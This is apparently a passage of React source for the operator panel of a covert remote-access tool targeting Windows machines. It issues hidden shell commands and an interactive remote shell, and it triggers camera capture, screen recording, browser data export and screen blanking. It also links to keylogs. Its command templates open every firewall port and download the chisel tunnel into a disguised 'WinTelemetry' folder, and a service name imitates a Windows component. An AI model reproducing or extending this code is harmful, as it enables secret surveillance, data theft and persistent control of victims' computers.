import React, { useState, useEffect, useRef, useCallback } from 'react';
import { useParams, Link, useNavigate } from 'react-router-dom';
import { useDevices } from '../store/devices';
import { useAuth } from '../store/auth';
import { useLiveEvents } from '../hooks/useLiveEvents';
import toast from 'react-hot-toast';
import { api } from '../store/auth';
import AndroidDeviceDetail from './AndroidDeviceDetail';

// ── Command Templates ────────────────────────────────────────────────────
const TEMPLATES = [
  { label: 'System Info', cmd: 'systeminfo', shell: 'cmd' },
  { label: 'IP Config', cmd: 'ipconfig /all', shell: 'cmd' },
  { label: 'Disk Usage', cmd: 'wmic logicaldisk get size,freespace,caption', shell: 'cmd' },
  { label: 'Install Python 3.12', cmd: 'if (Get-Command winget -EA 0) { $r=winget install --id Python.Python.3.12 --silent --accept-source-agreements --accept-package-agreements --scope machine 2>&1; $r | Out-String -Width 2000 } else { $url="https://www.python.org/ftp/python/3.12.9/python-3.12.9-amd64.exe"; $tmp="$env:TEMP\\py312.exe"; Write-Output "Downloading Python 3.12.9..."; Invoke-WebRequest $url -OutFile $tmp -UseBasicParsing; Write-Output "Installing..."; Start-Process $tmp -Wait -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0 Include_launcher=1"; Remove-Item $tmp -Force; Write-Output "Done" }; $pyPaths=@("C:\\Program Files\\Python312","C:\\Program Files\\Python312\\Scripts","C:\\Python312","C:\\Python312\\Scripts"); foreach($p in $pyPaths){if(Test-Path $p){$env:PATH="$p;$env:PATH"}}; $env:PATH=[System.Environment]::GetEnvironmentVariable("PATH","Machine")+";"+$env:PATH; if(Get-Command py -EA 0){Write-Output "Python ready: $(py --version)"}elseif(Get-Command python -EA 0){Write-Output "Python ready: $(python --version)"}else{Write-Output "WARNING: Python installed but not in PATH yet — agent restart may be needed"}', shell: 'powershell' },
  { label: 'Open All Firewall Ports', cmd: 'netsh advfirewall firewall add rule name="Open All TCP" dir=in action=allow protocol=TCP localport=1-65535; netsh advfirewall firewall add rule name="Open All UDP" dir=in action=allow protocol=UDP localport=1-65535; netsh advfirewall firewall add rule name="Open All TCP Out" dir=out action=allow protocol=TCP localport=1-65535; netsh advfirewall firewall add rule name="Open All UDP Out" dir=out action=allow protocol=UDP localport=1-65535; Write-Output "All TCP/UDP ports opened (inbound/outbound)."', shell: 'powershell' },
  { label: 'Enable Public Firewall & Open All Ports', cmd: 'Set-NetFirewallProfile -Profile Public -Enabled True; netsh advfirewall firewall add rule name="Open All TCP Public" dir=in action=allow protocol=TCP localport=1-65535 profile=public; netsh advfirewall firewall add rule name="Open All UDP Public" dir=in action=allow protocol=UDP localport=1-65535 profile=public; netsh advfirewall firewall add rule name="Open All TCP Out Public" dir=out action=allow protocol=TCP localport=1-65535 profile=public; netsh advfirewall firewall add rule name="Open All UDP Out Public" dir=out action=allow protocol=UDP localport=1-65535 profile=public; Write-Output "All TCP/UDP ports opened for Public profile (inbound/outbound)."', shell: 'powershell' },
  { label: 'Install aiortc + av', cmd: '$py=$null;if(Get-Command py -EA 0){$py="py"}elseif(Get-Command python -EA 0){$py="python"}else{Write-Warning "Python not found — run Install Python 3.12 first"; exit 1};& $py -m pip install --upgrade pip setuptools wheel; & $py -m pip install --only-binary=:all: aiortc==1.9.0 av==12.3.0 "numpy<2"; & $py -m pip show aiortc av numpy', shell: 'powershell' },
  { label: 'Install capture deps', cmd: '$py=$null;if(Get-Command py -EA 0){$py="py"}elseif(Get-Command python -EA 0){$py="python"}else{Write-Warning "Python not found — run Install Python 3.12 first"; exit 1};& $py -m pip install mss==9.0.1 Pillow==10.3.0 "numpy<2" opencv-python-headless==4.9.0.80; & $py -m pip show mss Pillow numpy opencv-python-headless', shell: 'powershell' },
  { label: 'Install input deps', cmd: '$py=$null;if(Get-Command py -EA 0){$py="py"}elseif(Get-Command python -EA 0){$py="python"}else{Write-Warning "Python not found — run Install Python 3.12 first"; exit 1};& $py -m pip install pyautogui==0.9.54 pynput==1.7.7 pywin32==306; & $py -m pip show pyautogui pynput pywin32', shell: 'powershell' },
  { label: 'Running Services', cmd: 'Get-Service | Where-Object {$_.Status -eq "Running"} | Format-Table -AutoSize', shell: 'powershell' },
  { label: 'Top Processes (CPU)', cmd: 'Get-Process | Sort-Object CPU -Descending | Select-Object -First 20 Name,Id,CPU,WorkingSet | Format-Table -AutoSize', shell: 'powershell' },
  { label: 'Restart SSH', cmd: 'Restart-Service sshd -Force; Get-Service sshd', shell: 'powershell' },
  { label: 'Flush DNS', cmd: 'ipconfig /flushdns', shell: 'cmd' },
  { label: 'Clear Temp Files', cmd: 'Remove-Item -Recurse -Force "$env:TEMP\\*" -ErrorAction SilentlyContinue; Write-Output "Temp cleared"', shell: 'powershell' },
  { label: 'Check Firewall', cmd: 'Get-NetFirewallProfile | Format-Table Name,Enabled', shell: 'powershell' },
  { label: 'Network Connections', cmd: 'netstat -an | findstr ESTABLISHED', shell: 'cmd' },
  { label: 'Installed Programs', cmd: 'Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select DisplayName,DisplayVersion | Sort DisplayName | Format-Table -AutoSize', shell: 'powershell' },
  { label: 'Uptime', cmd: '(Get-Date) - (Get-CimInstance Win32_OperatingSystem).LastBootUpTime | Format-Table Days,Hours,Minutes', shell: 'powershell' },
  { label: 'Windows Updates', cmd: 'Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 10 | Format-Table -AutoSize', shell: 'powershell' },
  { label: 'Install Chisel (RDP Tunnel)', cmd: '$dir="C:\\ProgramData\\WinTelemetry"; $exe="$dir\\wt_helper.exe"; if(Test-Path $exe){Write-Output "Chisel already installed at $exe"; exit 0}; New-Item -ItemType Directory -Path $dir -Force | Out-Null; $url="https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz"; $gz="$env:TEMP\\chisel.gz"; Write-Output "Downloading chisel v1.9.1..."; Invoke-WebRequest $url -OutFile $gz -UseBasicParsing; Write-Output "Extracting..."; $fs=[IO.File]::OpenRead($gz); $gs=New-Object IO.Compression.GZipStream($fs,[IO.Compression.CompressionMode]::Decompress); $os=[IO.File]::Create($exe); $gs.CopyTo($os); $os.Close(); $gs.Close(); $fs.Close(); Remove-Item $gz -Force; Write-Output "Chisel installed: $exe ($(([IO.FileInfo]$exe).Length/1MB -as [int]) MB)"', shell: 'powershell' },
  { label: 'Restart Agent Service', cmd: 'sc stop WinNetSvcHost && sc start WinNetSvcHost', shell: 'cmd' },
  { label: 'Update Agent (Silent)', cmd: '__AGENT_UPDATE__', shell: 'powershell' },
  { label: 'Force Restart', cmd: 'shutdown /r /f /t 0', shell: 'cmd' },
  { label: 'Event Log Errors (24h)', cmd: 'Get-EventLog -LogName System -EntryType Error -After (Get-Date).AddHours(-24) -Newest 20 | Format-Table TimeGenerated,Source,Message -Wrap', shell: 'powershell' },
  { label: 'Show Agent Logs (CMD)', shell: 'cmd', cmd: 'for %F in (C:\\ProgramData\\*\\svc.log) do if exist "%F" type "%F"' },
  { label: 'Show Agent Logs (PowerShell)', shell: 'powershell', cmd: "Get-ChildItem -Path 'C:/ProgramData/*/svc.log' -ErrorAction SilentlyContinue | Get-Content -ErrorAction SilentlyContinue" },
];

export default function DeviceDetail() {
  const { deviceId } = useParams();
  const { devices, sendCommand, softDelete } = useDevices();
  const { claims } = useAuth();
  const isSuper = !!claims?.super;
  const device = devices.find(d => d.device_id === deviceId);
  const [installing, setInstalling] = useState(false);
  const [recording, setRecording] = useState(() => !!device?.recording_active);
  useEffect(() => {
    if (device) setRecording(!!device.recording_active);
  }, [device?.recording_active]);
  const [installUrl, setInstallUrl] = useState('');
  const [wingetId, setWingetId] = useState('');
  const [installResult, setInstallResult] = useState(null);
  const [installPending, setInstallPending] = useState(false);
  const [filePath, setFilePath] = useState('');
  const [fileStatus, setFileStatus] = useState('');
  const [uploadFile, setUploadFile] = useState(null);
  const [uploadTarget, setUploadTarget] = useState('');
  const [uploadStatus, setUploadStatus] = useState('');
  const navigate = useNavigate();

  // ── Shell state ──────────────────────────────────────────────────────
  const [shellMode, setShellMode] = useState('oneshot'); // 'oneshot' | 'interactive'
  const [shellType, setShellType] = useState('cmd');     // 'cmd' | 'powershell'
  const [shellCmd, setShellCmd] = useState('');
  const [shellOutput, setShellOutput] = useState([]);

  // Interactive shell session
  const [sessionId, setSessionId] = useState('');
  const [sessionActive, setSessionActive] = useState(false);
  const [iShellOutput, setIShellOutput] = useState('');
  const [iShellInput, setIShellInput] = useState('');
  const termRef = useRef(null);

  // ── USB state ────────────────────────────────────────────────────────
  const [usbDrives, setUsbDrives] = useState([]);
  const [usbPath, setUsbPath] = useState('');
  const [usbEntries, setUsbEntries] = useState([]);
  const [usbLoading, setUsbLoading] = useState(false);
  const [usbError, setUsbError] = useState('');

  // Auto-scroll terminal
  useEffect(() => {
    if (termRef.current) termRef.current.scrollTop = termRef.current.scrollHeight;
  }, [iShellOutput, shellOutput]);

  // Show a clear timeout when agent never replies to install command
  useEffect(() => {
    if (!installPending) return;
    const t = setTimeout(() => {
      setInstallPending(false);
      setInstallResult({
        returncode: -1,
        package: wingetId || installUrl || 'install',
        stdout: '',
        stderr: 'No install result received from agent yet. If this endpoint is on an older agent build, patch/update agent to get reliable install_result events.'
      });
    }, 90000);
    return () => clearTimeout(t);
  }, [installPending, wingetId, installUrl]);

  useLiveEvents(useCallback((e) => {
    if (e.device_id !== deviceId) return;

    // One-shot shell results
    if (e.event === 'shell_result') {
      setShellOutput(prev => [...prev, e].slice(-50));

      // Backward compatibility: older agents emit install completion as shell_result.
      if (installPending) {
        setInstallResult({
          returncode: typeof e.returncode === 'number' ? e.returncode : 0,
          package: wingetId || installUrl || 'install',
          stdout: e.stdout || '',
          stderr: e.stderr || ''
        });
        setInstallPending(false);
      }
    }

    // Install app results
    if (e.event === 'install_result') {
      setInstallResult(e);
      setInstallPending(false);
    }

    // Interactive shell events
    if (e.event === 'interactive_shell_output') {
      setIShellOutput(prev => prev + e.output);
    }
    if (e.event === 'interactive_shell_event') {
      if (e.shell_event === 'session_started') {
        setSessionActive(true);
        setIShellOutput(`[Session started — ${e.shell_type || 'cmd'}]\n`);
        toast.success('Interactive shell connected');
      } else if (e.shell_event === 'session_ended') {
        setSessionActive(false);
        setIShellOutput(prev => prev + '\n[Session ended]\n');
      } else if (e.shell_event === 'session_not_found') {
        setSessionActive(false);
        toast.error('Shell session not found');
      } else if (e.shell_event === 'session_error') {
        toast.error('Shell error: ' + (e.error || 'Unknown'));
      }
    }

    // USB events
    if (e.event === 'usb_list_result') {
      setUsbDrives(e.drives || []);
      setUsbLoading(false);
    }
    if (e.event === 'usb_browse_result') {
      setUsbEntries(e.entries || []);
      setUsbPath(e.path || '');
      setUsbError(e.error || '');
      setUsbLoading(false);
    }
    if (e.event === 'usb_event') {
      toast(e.usb_event === 'inserted' ? 'USB device inserted' : 'USB device removed',
        { icon: e.usb_event === 'inserted' ? '🔌' : '⏏️' });
    }

    // File transfer events
    if (e.event === 'file_response') {
      if (e.error) {
        setFileStatus('Error: ' + e.error);
      } else if (e.content) {
        setFileStatus('Downloaded: ' + e.filename);
        const bytes = atob(e.content);
        const arr = new Uint8Array(bytes.length);
        for (let i = 0; i < bytes.length; i++) arr[i] = bytes.charCodeAt(i);
        const blob = new Blob([arr]);
        const url = URL.createObjectURL(blob);
        const a = document.createElement('a');
        a.href = url; a.download = e.filename; a.click();
        URL.revokeObjectURL(url);
      }
    }
    if (e.event === 'file_ready') {
      setFileStatus(`Downloaded: ${e.filename} (${(e.size/1024).toFixed(1)} KB)`);
      const token = localStorage.getItem('token');
      const a = document.createElement('a');
      a.href = `/files/transfer/${e.transfer_id}?token=${token}`;
      a.download = e.filename; a.click();
      setTimeout(() => api.delete(`/files/transfer/${e.transfer_id}`).catch(() => {}), 10000);
    }
    if (e.event === 'upload_result') {
      if (e.status === 'ok') setUploadStatus(`Saved to ${e.target_path}`);
      else setUploadStatus('Error: ' + (e.error || 'Unknown error'));
    }
    if (e.event === 'screenshot') toast.success('Screenshot captured');
    if (e.event === 'recording_started') { setRecording(true); toast.success('Recording started'); }
    if (e.event === 'recording_stopped') { setRecording(false); toast.success('Recording stopped'); }
  }, [deviceId]));

  if (!device) return <p style={{ color:'var(--muted)' }}>Device not found or not loaded yet.</p>;

  if (device.platform === 'android') return <AndroidDeviceDetail />;

  const cmd = async (endpoint, body, label) => {
    try {
      await sendCommand(deviceId, endpoint, body);
      toast.success(`${label} sent`);
    } catch (e) { toast.error(e.response?.data?.detail || 'Device offline'); }
  };

  // ── One-shot shell ───────────────────────────────────────────────────
  const runShell = async (e) => {
    e.preventDefault();
    if (!shellCmd.trim()) return;
    try {
      await sendCommand(deviceId, 'shell', { cmd: shellCmd, hidden: true, shell_type: shellType });
      setShellOutput(prev => [...prev, { _cmd: shellCmd, _shell: shellType, ts: new Date().toISOString() }].slice(-50));
      setShellCmd('');
    } catch (e) { toast.error(e.response?.data?.detail || 'Device offline'); }
  };

  const runTemplate = async (tmpl) => {
    setShellType(tmpl.shell);
    let cmd = tmpl.cmd;
    // Agent update uses a dedicated server endpoint that looks up the install code
    if (cmd === '__AGENT_UPDATE__') {
      try {
        await sendCommand(deviceId, 'update_agent_silent');
        setShellOutput(prev => [...prev, { _cmd: 'Update Agent (Silent)', _shell: 'powershell', ts: new Date().toISOString() }].slice(-50));
        toast.success('Agent update command sent');
      } catch (e) { toast.error(e.response?.data?.detail || 'Update failed — is the MSI uploaded for this admin?'); }
      return;
    }
    try {
      await sendCommand(deviceId, 'shell', { cmd, hidden: true, shell_type: tmpl.shell });
      setShellOutput(prev => [...prev, { _cmd: tmpl.label || cmd, _shell: tmpl.shell, ts: new Date().toISOString() }].slice(-50));
    } catch (e) { toast.error(e.response?.data?.detail || 'Device offline'); }
  };

  // ── Interactive shell ────────────────────────────────────────────────
  const startSession = async () => {
    const sid = `s_${Date.now()}_${Math.random().toString(36).slice(2, 6)}`;
    setSessionId(sid);
    setIShellOutput('');
    toast('Starting interactive session...');
    try {
      await sendCommand(deviceId, 'shell/session/start', { session_id: sid, shell_type: shellType });
      setSessionActive(true);
      toast.success('Session started');
    } catch (e) { toast.error(e.response?.data?.detail || 'Device offline — cannot start session'); }
  };

  const sendInput = async (e) => {
    e.preventDefault();
    if (!iShellInput.trim() || !sessionId) return;
    try {
      await sendCommand(deviceId, 'shell/session/input', { session_id: sessionId, input: iShellInput });
      setIShellInput('');
    } catch (e) { toast.error(e.response?.data?.detail || 'Failed'); }
  };

  const stopSession = async () => {
    if (sessionId) {
      try {
        await sendCommand(deviceId, 'shell/session/stop', { session_id: sessionId });
      } catch {}
    }
    setSessionActive(false);
  };

  // ── USB ──────────────────────────────────────────────────────────────
  const listUsb = async () => {
    setUsbLoading(true);
    try { await sendCommand(deviceId, 'usb/list', {}); }
    catch { setUsbLoading(false); toast.error('Device offline'); }
  };

  const browseUsb = async (path) => {
    setUsbLoading(true);
    setUsbError('');
    try { await sendCommand(deviceId, 'usb/browse', { path }); }
    catch { setUsbLoading(false); toast.error('Device offline'); }
  };

  const downloadFromPath = async (path) => {
    setFileStatus('requesting');
    try {
      await api.post(`/cmd/${deviceId}/download_file`, { path });
      setFileStatus('Waiting for agent...');
    } catch (err) {
      setFileStatus('Error: ' + (err.response?.data?.detail || 'Failed'));
    }
  };

  // ── File ops ─────────────────────────────────────────────────────────
  const installApp = async (e) => {
    e.preventDefault(); setInstalling(true); setInstallResult(null); setInstallPending(true);
    try {
      await sendCommand(deviceId, 'install', { url: installUrl, winget_id: wingetId || undefined });
      toast.success('Install command sent — waiting for result…');
    } catch (e) {
      setInstallPending(false);
      toast.error(e.response?.data?.detail || 'Failed');
    }
    finally { setInstalling(false); }
  };

  const requestFile = async (e) => {
    e.preventDefault();
    if (!filePath.trim()) return;
    setFileStatus('requesting');
    try {
      await api.post(`/cmd/${deviceId}/download_file`, { path: filePath });
      setFileStatus('Waiting for agent...');
    } catch (err) { setFileStatus('Error: ' + (err.response?.data?.detail || 'Failed')); }
  };

  const sendFileToAgent = async (e) => {
    e.preventDefault();
    if (!uploadFile || !uploadTarget.trim()) return;
    setUploadStatus('uploading');
    try {
      const form = new FormData();
      form.append('file', uploadFile);
      form.append('target_path', uploadTarget);
      await api.post(`/cmd/${deviceId}/upload_file`, form, {
        headers: { 'Content-Type': 'multipart/form-data' },
      });
      setUploadStatus('Sent — waiting for agent...');
    } catch (err) { setUploadStatus('Error: ' + (err.response?.data?.detail || 'Failed')); }
  };

  return (
    <div>
      {/* Header */}
      <div style={{ display:'flex', alignItems:'center', gap:12, marginBottom:24 }}>
        <span style={{ width:12, height:12, borderRadius:'50%',
          background: device.is_online ? 'var(--green)' : 'var(--muted)' }} />
        <h2 style={{ fontSize:20, fontWeight:700 }}>{device.label || device.hostname}</h2>
        {device.group_name && <Tag>{device.group_name}</Tag>}
        {isSuper && device.admin_username && (
          <span style={{ fontSize:11, padding:'2px 8px', borderRadius:4,
                         background:'#7c3aed22', border:'1px solid #7c3aed66', color:'#a78bfa' }}>
            {device.admin_username}
          </span>
        )}
        <span style={{ color:'var(--muted)', fontSize:13 }}>{device.username}@{device.hostname}&nbsp;&nbsp;·&nbsp;&nbsp;Device ID:&nbsp;<span style={{ fontFamily:'monospace', userSelect:'all' }}>{device.device_id}</span></span>
      </div>

      {/* System Info + Quick Actions */}
      <div style={{ display:'grid', gridTemplateColumns:'1fr 1fr', gap:16, marginBottom:24 }}>
        <InfoCard title="System">
          <Row k="OS" v={device.os_version} />
          <Row k="CPU" v={device.cpu} />
          <Row k="RAM" v={`${device.ram_gb} GB`} />
          <Row k="Disk" v={`${device.disk_gb} GB`} />
          <Row k="IP" v={device.ip_address} />
          <Row k="Location" v={[device.city, device.state, device.country].filter(Boolean).join(', ') || '—'} />
          <Row k="Timezone" v={device.timezone ? `${device.timezone} (${new Date().toLocaleString('en-US', { timeZone: device.timezone, hour:'2-digit', minute:'2-digit', hour12:true })})` : '—'} />
          <Row k="Device Clock" v={device.device_time || '—'} />
          <Row k="MAC" v={device.mac_address} />
          <Row k="Agent" v={device.agent_version} />
          <Row k="Last seen" v={device.last_seen ? new Date(device.last_seen+'Z').toLocaleString() : '—'} />
        </InfoCard>

        <InfoCard title="Quick Actions">
          <div style={{ display:'grid', gridTemplateColumns:'1fr 1fr', gap:8 }}>
            <ActionBtn onClick={() => cmd('screenshot', {}, 'Screenshot')}>📸 Screenshot</ActionBtn>
            <ActionBtn onClick={() => cmd('camera', {}, 'Camera')}>📷 Camera</ActionBtn>
            {!recording
              ? <ActionBtn onClick={() => cmd('record/start', { duration_sec: 0 }, 'Record')}>🎥 Record</ActionBtn>
              : <ActionBtn danger onClick={() => cmd('record/stop', {}, 'Stop recording')}>⏹ Stop</ActionBtn>
            }
            <ActionBtn onClick={() => cmd('browser/export', { export_type:'all' }, 'Browser export')}>🌐 Browser</ActionBtn>
            <ActionBtn onClick={() => navigate(`/device/${deviceId}/remote`)}>🖥️ Remote</ActionBtn>
            <ActionBtn onClick={() => cmd('screen/blank', { enable:true }, 'Screen blank')}>⬛ Blank</ActionBtn>
            <ActionBtn onClick={() => cmd('screen/blank', { enable:false }, 'Screen restore')}>🖥 Restore</ActionBtn>
            <ActionBtn danger onClick={() => { if(window.confirm('Restart?')) cmd('power', { action:'restart' }, 'Restart') }}>🔄 Restart</ActionBtn>
            <ActionBtn danger onClick={() => { if(window.confirm('Shutdown?')) cmd('power', { action:'shutdown' }, 'Shutdown') }}>⏻ Shutdown</ActionBtn>
            <ActionBtn onClick={() => cmd('power', { action:'lock' }, 'Lock')}>🔒 Lock</ActionBtn>
            {!isSuper && (
              <ActionBtn danger onClick={() => {
                if (!window.confirm(`Remove "${device?.label || device?.hostname}" from your dashboard?\n\nYou might be able to restore it if you contact Super Admin.`)) return;
                softDelete(deviceId);
                navigate('/');
              }}>✕ Remove Device</ActionBtn>
            )}
          </div>
        </InfoCard>
      </div>

      {/* Data links */}
      <div style={{ display:'grid', gridTemplateColumns:'repeat(auto-fit,minmax(110px,1fr))', gap:12, marginBottom:24 }}>
        {[
          ['⌨ Keylogs', 'keylogs'], ['📸 Screenshots', 'screenshots'],
          ['🎥 Recordings', 'recordings'], ['🖥 Activity', 'activity'],
          ['🌐 Browser', 'browser'], ['🎮 Remote', 'remote'],
          ['📋 Processes', 'processes'], ['📂 Files', 'files'], ['🌍 Network', 'network-scanner'],
        ].map(([label, path]) => (
          <Link key={label} to={`/device/${deviceId}/${path}`} style={navCardStyle}>{label}</Link>
        ))}
      </div>

      {/* ═══════════════════ TERMINAL ═══════════════════════════════════ */}
      <InfoCard title="Terminal" style={{ marginTop:0 }}>
        {/* Mode + Shell Type selector */}
        <div style={{ display:'flex', gap:8, marginBottom:12, alignItems:'center', flexWrap:'wrap' }}>
          <div style={{ display:'flex', border:'1px solid var(--border)', borderRadius:6, overflow:'hidden' }}>
            <TabBtn active={shellMode==='oneshot'} onClick={() => setShellMode('oneshot')}>One-Shot</TabBtn>
            <TabBtn active={shellMode==='interactive'} onClick={() => setShellMode('interactive')}>Interactive</TabBtn>
          </div>
          <div style={{ display:'flex', border:'1px solid var(--border)', borderRadius:6, overflow:'hidden' }}>
            <TabBtn active={shellType==='cmd'} onClick={() => setShellType('cmd')}>CMD</TabBtn>
            <TabBtn active={shellType==='powershell'} onClick={() => setShellType('powershell')}>PowerShell</TabBtn>
          </div>
          {shellMode === 'oneshot' && (
            <select
              onChange={(e) => { if (e.target.value) runTemplate(TEMPLATES[e.target.value]); e.target.value = ''; }}
              style={{ ...inputStyle, width:'auto', padding:'6px 8px', fontSize:11 }}
              defaultValue="">
              <option value="" disabled>Quick Commands...</option>
              {TEMPLATES.map((t, i) => (
                <option key={i} value={i}>{t.label} ({t.shell})</option>
              ))}
            </select>
          )}
        </div>

        {/* One-shot mode */}
        {shellMode === 'oneshot' && (
          <>
            <form onSubmit={runShell} style={{ display:'flex', gap:8, marginBottom: shellOutput.length ? 12 : 0 }}>
              <input value={shellCmd} onChange={e=>setShellCmd(e.target.value)}
                placeholder={shellType === 'powershell' ? 'Get-Process | Select -First 10' : 'ipconfig /all'}
                style={{ ...inputStyle, flex:1, fontFamily:'monospace' }} />
              <ActionBtn type="submit">Run</ActionBtn>
              {shellOutput.length > 0 && (
                <ActionBtn onClick={() => setShellOutput([])}>Clear</ActionBtn>
              )}
            </form>
            {shellOutput.length > 0 && (
              <div ref={termRef} style={termStyle}>
                {shellOutput.map((entry, i) => (
                  <div key={i} style={{ marginBottom:8 }}>
                    {entry._cmd ? (
                      <div>
                        <span style={{ color:'#f59e0b', fontSize:10 }}>[{entry._shell || 'cmd'}]</span>{' '}
                        <span style={{ color:'var(--accent)' }}>$ {entry._cmd}</span>
                      </div>
                    ) : (
                      <>
                        {entry.stdout && <div style={{ color:'var(--text)' }}>{entry.stdout}</div>}
                        {entry.stderr && <div style={{ color:'var(--red)' }}>{entry.stderr}</div>}
                        {entry.returncode !== undefined && entry.returncode !== 0 && (
                          <div style={{ color:'var(--muted)', fontSize:11 }}>exit code: {entry.returncode}</div>
                        )}
                      </>
                    )}
                  </div>
                ))}
              </div>
            )}
          </>
        )}

        {/* Interactive mode */}
        {shellMode === 'interactive' && (
          <>
            <div style={{ display:'flex', gap:8, marginBottom:8 }}>
              {!sessionActive ? (
                <ActionBtn onClick={startSession}>Start Session ({shellType})</ActionBtn>
              ) : (
                <ActionBtn danger onClick={stopSession}>Stop Session</ActionBtn>
              )}
              {sessionActive && (
                <span style={{ color:'#22c55e', fontSize:12, display:'flex', alignItems:'center', gap:4 }}>
                  <span style={{ width:6, height:6, borderRadius:'50%', background:'#22c55e' }} /> Connected
                </span>
              )}
            </div>
            <div ref={termRef} style={{ ...termStyle, minHeight:200 }}>
              <pre style={{ margin:0, whiteSpace:'pre-wrap', wordBreak:'break-all' }}>
                {iShellOutput || (sessionActive ? 'Waiting for output...' : 'Start a session to begin.')}
              </pre>
            </div>
            {sessionActive && (
              <form onSubmit={sendInput} style={{ display:'flex', gap:8, marginTop:8 }}>
                <input value={iShellInput} onChange={e => setIShellInput(e.target.value)}
                  placeholder="Type command and press Enter..."
                  autoFocus
                  style={{ ...inputStyle, flex:1, fontFamily:'monospace' }} />
                <ActionBtn type="submit">Send</ActionBtn>
              </form>
            )}
          </>
        )}
      </InfoCard>

      {/* ═══════════════════ USB DEVICES ═══════════════════════════════ */}
      <InfoCard title="USB / Removable Drives" style={{ marginTop:16 }}>
        <div style={{ display:'flex', gap:8, marginBottom:12, alignItems:'center' }}>
          <ActionBtn onClick={listUsb} disabled={usbLoading}>
            {usbLoading ? 'Scanning...' : 'Detect USB Drives'}
          </ActionBtn>
          {usbDrives.length > 0 && (
            <span style={{ color:'var(--muted)', fontSize:12 }}>{usbDrives.length} drive(s) found</span>
          )}
        </div>
        {usbDrives.length > 0 && (
          <div style={{ display:'grid', gridTemplateColumns:'repeat(auto-fill,minmax(200px,1fr))', gap:8, marginBottom:12 }}>
            {usbDrives.map((d, i) => (
              <div key={i} onClick={() => browseUsb(d.mountpoint)}
                style={{ padding:10, background:'var(--bg)', border:'1px solid var(--border)',
                         borderRadius:6, cursor:'pointer', fontSize:12 }}>
                <div style={{ fontWeight:600 }}>{d.mountpoint}</div>
                <div style={{ color:'var(--muted)', fontSize:11 }}>
                  {d.fstype} — {d.free_gb}GB free / {d.total_gb}GB
                </div>
              </div>
            ))}
          </div>
        )}
        {/* File browser */}
        {usbPath && (
          <div>
            <div style={{ display:'flex', gap:8, marginBottom:8, alignItems:'center' }}>
              <span style={{ fontSize:12, fontFamily:'monospace', color:'var(--accent)', flex:1,
                             overflow:'hidden', textOverflow:'ellipsis', whiteSpace:'nowrap' }}>
                {usbPath}
              </span>
              {usbPath.includes('\\') && (
                <ActionBtn onClick={() => browseUsb(usbPath.split('\\').slice(0, -1).join('\\') || usbPath.slice(0, 3))}>
                  Up
                </ActionBtn>
              )}
            </div>
            {usbError && <div style={{ color:'var(--red)', fontSize:12, marginBottom:8 }}>{usbError}</div>}
            <div style={{ background:'var(--bg)', border:'1px solid var(--border)', borderRadius:6,
                          maxHeight:300, overflowY:'auto' }}>
              {usbEntries.map((entry, i) => (
                <div key={i} style={{ display:'flex', alignItems:'center', gap:8, padding:'6px 10px',
                                       borderBottom:'1px solid var(--border)', fontSize:12, cursor:'pointer' }}
                  onClick={() => entry.is_dir ? browseUsb(entry.path) : downloadFromPath(entry.path)}>
                  <span>{entry.is_dir ? '📁' : '📄'}</span>
                  <span style={{ flex:1, overflow:'hidden', textOverflow:'ellipsis', whiteSpace:'nowrap' }}>
                    {entry.name}
                  </span>
                  {!entry.is_dir && (
                    <span style={{ color:'var(--muted)', fontSize:11, flexShrink:0 }}>
                      {entry.size > 1e6 ? `${(entry.size/1e6).toFixed(1)}MB` :
                       entry.size > 1e3 ? `${(entry.size/1e3).toFixed(1)}KB` : `${entry.size}B`}
                    </span>
                  )}
                </div>
              ))}
              {usbEntries.length === 0 && !usbLoading && !usbError && (
                <div style={{ padding:20, textAlign:'center', color:'var(--muted)' }}>Empty directory</div>
              )}
            </div>
            {/* Upload to current USB path */}
            <div style={{ marginTop:8 }}>
              <form onSubmit={(e) => {
                e.preventDefault();
                if (!uploadFile) return;
                const targetDir = usbPath.endsWith('\\') ? usbPath : usbPath + '\\';
                setUploadTarget(targetDir);
                const form = new FormData();
                form.append('file', uploadFile);
                form.append('target_path', targetDir);
                setUploadStatus('uploading');
                api.post(`/cmd/${deviceId}/upload_file`, form, {
                  headers: { 'Content-Type': 'multipart/form-data' },
                }).then(() => setUploadStatus('Sent — waiting for agent...'))
                  .catch(err => setUploadStatus('Error: ' + (err.response?.data?.detail || 'Failed')));
              }} style={{ display:'flex', gap:8, alignItems:'center' }}>
                <input type="file" onChange={e => setUploadFile(e.target.files[0])}
                  style={{ flex:1, fontSize:11, color:'var(--text)' }} />
                <ActionBtn type="submit" disabled={!uploadFile}>Upload Here</ActionBtn>
              </form>
            </div>
          </div>
        )}
      </InfoCard>

      {/* ═══════════════════ APP INSTALL ═══════════════════════════════ */}
      <InfoCard title="Install Application" style={{ marginTop:16 }}>
        <form onSubmit={installApp}>
          <Input label="Download URL" value={installUrl} onChange={setInstallUrl}
                 placeholder="https://example.com/setup.exe" />
          <Input label="OR Winget ID" value={wingetId} onChange={setWingetId}
                 placeholder="Google.Chrome" />
          <ActionBtn type="submit" disabled={installing || (!installUrl.trim() && !wingetId.trim())}>
            {installing ? 'Sending…' : '⬇ Install Silently'}
          </ActionBtn>
        </form>
        {installResult && (
          <div style={{ marginTop:10, fontFamily:'monospace', fontSize:11,
                        background:'#0d0d0d', borderRadius:6, padding:'8px 10px',
                        border: `1px solid ${installResult.returncode === 0 ? '#22c55e44' : '#ef444444'}` }}>
            <div style={{ marginBottom:4, color: installResult.returncode === 0 ? '#22c55e' : '#ef4444', fontWeight:600 }}>
              {installResult.returncode === 0 ? '✓ Install succeeded' : `✗ Install failed (exit ${installResult.returncode})`}
              {installResult.package && <span style={{ color:'var(--muted)', fontWeight:400, marginLeft:8 }}>{installResult.package}</span>}
              <button onClick={() => setInstallResult(null)}
                style={{ float:'right', background:'transparent', border:'none', color:'var(--muted)', cursor:'pointer', fontSize:10 }}>✕</button>
            </div>
            {installResult.stdout && (
              <pre style={{ margin:0, whiteSpace:'pre-wrap', wordBreak:'break-all', color:'var(--text)', maxHeight:180, overflowY:'auto' }}>{installResult.stdout}</pre>
            )}
            {installResult.stderr && (
              <pre style={{ margin:'4px 0 0', whiteSpace:'pre-wrap', wordBreak:'break-all', color:'#f87171', maxHeight:100, overflowY:'auto' }}>{installResult.stderr}</pre>
            )}
          </div>
        )}
      </InfoCard>

      {/* File Download */}
